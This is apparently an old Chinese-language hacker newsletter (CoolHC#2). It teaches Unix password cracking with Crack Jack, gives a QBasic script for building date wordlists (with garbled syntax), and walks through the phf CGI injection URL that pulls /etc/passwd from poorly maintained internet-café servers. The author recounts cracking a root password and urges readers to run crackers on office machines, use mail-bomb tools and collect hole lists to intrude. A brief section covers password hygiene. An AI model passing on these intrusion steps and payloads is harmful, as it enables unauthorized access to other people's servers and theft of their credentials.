**談一下 Crack Jack 猜猜密碼
許多人從上一次介紹 Crack Jack 之後就應該已經領教過它的功力了, 但是有幾點需要
說明的,有些人使用 Jack 來幫你尋找 password, 我就當你已經抓到了沒有 shadow
的 /etc/passwd,但是為甚麼使用 Jack 還是找不到呢?? 我想你應該要換個正點一點的
字典檔了, 因為 Jack 還是根據你所提供的字典檔在尋找, 如果你提供的字典本身就沒
有這些字, 那當然連一個小小帳號的密碼你都別想猜到了. 數一下你所使用的字典檔中
有多少字 ??? 我用的字典檔有十九萬多個字, 你的呢? 是不是小巫見大巫呀 ?? 那麼就
趕快充實一下字典檔再重新尋找吧 !!
許多人的密碼都有一定的法則, 我自己寫了 PaSs2DiC 就是將 UserName 由 passwd檔轉
成字典檔的工具, 這是對一些喜歡使用 UserName 當作 Password 的人最好的方式, 但
是也曾經好運的找到別人的密碼, 真不曉得"甲"是不是暗戀"乙"才用"乙"的 ID 作為密
碼的 ??? 你可以很簡單的使用 Qbasic 來製作 "序數" 密碼, 或日期密碼, 底下簡單
的作一個 0101 (一月一日) 到 1231 的密碼檔出來:
------------Cut Here MakeDate.BAS -------------------
Open "Dates" for output as #1
for I=1 to 12
for J=1 to 31
I1$=rtrim$(ltrim$str$(I)))
J1$=rtrim$(ltrim$str$(J)))
if len(I1$)=1 then I1$="0"+I1$
if len(J1$)=1 then J1$="0"+J1$
Out$=I1$+J1$
print #1,Out$
next I
next J
close
------------ Cut Here End MakeDate.BAS ----------------
這支小程式將會寫一個 "DATES" 的檔案, 裡面就是你要的字典, 當然啦, 這只是包含月
跟日!! 如果你要猜的密碼是含年份的, 你可能要再增加一些程式碼, 再 Run 一次試試
看了, 不過這是一個好的開始不是嗎??
**如何保護自己的密碼
談了這麼多的密碼猜法, 當然要談一下如何保護自己的密碼不被破解, 請遵守以下的原
則: [1] 不用生日作為密碼 (太容易猜了啦 ) [2] 不用序數作為密碼 (除非你的序數無
限大 ) [3] 不用身份證字號作為密碼 (LetMeIn! 裡有猜身份證字號的功能耶 ) [4] 不
用在字典中查得到的字作為密碼. 那麼依照上面的幾點說法, 甚麼樣子的密碼最不容易
猜, 自己也最好記呢? ? 答案是: 用一句有意義的話來作為自己的密碼, 例如:
NoOneCanCrackIt 就是一個很難猜的密碼類型, 基於這個密碼猜法的原則, 你的密碼是
不是要作些更新, 或是大小寫要作一些對調?? 如果你的密碼是 coolfire, 建議你最好
能改成 CoolFire 或 coolfires (加複數 "s"), 這樣被猜中的機率就小了很多. 如果你
是一個 Hacker, 你的密碼也被人猜中的話... 那...#%%^^^&@
**正式的話題
這次的話題當然還是 Crack, 相信許多人已經看過 CoolHC#1 了, 當然眼尖的人可能也
已經 D/L System Holes 試過了, 你有成功的例子嗎?? 如果沒有, 這份 CoolHC#2 可能
就是你的強心針, 因為這次談的正是 System Holes #1 成功的案例.
Step 1. 連線到 " 蕃薯籐 " 找 " 網路咖啡 " 找到好多家網路咖啡的 WWW 網址, 一一
連上去試試看在 System Holes #1 中的方法可不可行.
Step 2. 若可行則會傳回 /etc/passwd 資訊, 存檔後迅速 Logout, 使用 Crack Jack
解讀!!
[[實例探討]]
System Holes #1 中所介紹的 WWW 入侵法是這樣子的:
http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd
[1] 用 WWW Browser 連到 yournet.net
[2] Location 輸入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接著如果出來一份像 Report 的畫面的話, 接著輸入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 發生了甚麼事?? etc/passwd 在你的瀏覽器中 "顯示" 出來了 !!
快點 Save 吧 !!
這個方法所用的是系統 " 檢索 " 的漏洞, 不提供這個功能, 或是伺服器檢索類型不同
的機器則不會接受這樣的指令, 當然也就逃過我們這次的模擬演練啦!! 但是.... 相信
我, 你一定會找到一家脫線的網路咖啡, 並沒有像我們一樣每天閱讀 Mail List 的信,
對系統安全一點研究也沒有的人不在少數. http://hacker.welcome.com 就是這樣的一
個 Net Coffee Shop... 呵.... 快來試試吧!!
當 CoolFire 抓到 /etc/passwd 後, 立刻存檔, 也馬上斷線, 並且拿出 UltraEdit 來
瞧一下使用者的資訊, 當然這個小 passwd 對 Crack Jack 來說, 實在是不夠看, 沒幾
分鐘就在我的 486 機器上顯示出來幾個以 UserName 作為 Password 的資訊 (歸功於
PaSs2DiC 及 CrackJack 的功勞 ) 不過當我試著找尋 root 的密碼時, 一想到我那將近
20 萬字的字典檔, 就想到可能花費的時間一定相當的驚人, 於是就以 Jack 的 Option
設定只尋找 root 那一行,... (過了良久 )... 果不然又是一個笨 root. 用了 " 非常
" 容易猜的密碼... <--- This is JackAss... 呵!! Got It!
如果你所使用的機器速度不是頂快, 你最好能夠到快一點的機器上使用 Crack Jack, 不
然你也可以將字典檔切割成幾個小檔案, 然後再分別在幾台機器上跑, 我目前使用的配
備是 486DX4-130 32MB RAM, 3.2GB HDD, 近 20 萬字的字典檔, 如果在分析較大的
passwd 檔時我會將字典檔切割為四至五個小檔 (看有多少台機器可跑 ), 然後在週末下
班前在公司的幾台機器上分別執行 Crack Jack, 等到禮拜一上班時就等著接收成果了!
當然如果你只有一台機器, passwd 檔又很大的話, 由於 Crack Jack 無法於 Windoz 95
下使用, 你可能只能犧升時間或機器來跑了! 再沒有辦法的話, 亦可使用單機多工, 多
開幾個 DOS Box 來跑 Brute, 也許也是一個可行的辦法!
**後語
有許多人在使用 Crack Jack 的時候有許多問題, 不過看了 CoolHC#1 應該都解決了吧
?? 最近大家問的比較多的是 UpYours 3.0, 雖然已經改進了 Install 的問題, 不過大
家的問題還是都出在 Winsck.ocx 上面, 有人說裝了 MSICP Beta 會好?? 但也有實例裝
了也還不能 Run 的, 在此建議大家不要再玩 MailBomb 了, 雖然我喜歡收集這種東西,
但還是少亂炸為妙, 已經證實有許多常用的 MailBomb 沒有辦法 Fake IP 了!! 所以...
如果 UpYours 3.0 裝不起來的人就試試 KaBoom! V3.0 吧! 雖然沒有辦法 Fake IP (選
錯 Mail Server 的話 ), 但是也是一個不錯的 AnonyMailer 如果要發匿名信, 現在首
頁上有可以幫你發信的 Mailer, 會安全一點.
如果你仍舊對 UpYours 3.0 不死心, 就試試 ResSvr32.exe (Under Windows/system
directory), 看看能不能將 WinSck.ocx 裝上了... 記得先 UnReg 再 Reg...
在此建議大家可以多訂閱一些 " 系統安全 " 討論的 Mail List 或多參考一些已經被找
出來的系統漏洞, 因為有些人對這些方面並不是很重視, 所以這些資訊也就顯得格外的
重要了, 如果能夠多參考一些資訊, 在你入侵的時候會有很大的幫助, 當然, 如果你能
作出一份列表出來, 放在手邊參考的話, 就可以快速的; 安全的入侵了!! 下一次所談的
是 SendMail 的 Bug 實例, 在這中間當然照往例會先出一份 System Holes #2 來作為
資料. 如果有興趣的人在 SH#2 出來的時候可以先研究看看. 下次見! Merry
X'Mas..... & Happy New Year....... ------ 上次講的 Home Page 建置案還沒搞完,
沒有充實一下 Home Page 實在是對不起大家, 所以利用一點時間寫了 CoolHC#2, 可能
報告又交不出來了!! 老話, 如果你有興趣寫其它程式的中文說明, 請完成後寄一份給我
, 我將它放在 Home Page 上面讓其它人參考, 當然你也可以給我你的使用心得, 讓別人
參考看看也行! 目前準備收集一系列的 System Hole List, 如果你在其它的站台有看到
的, 請把它先 Cut 下來, Mail 一份給我!
|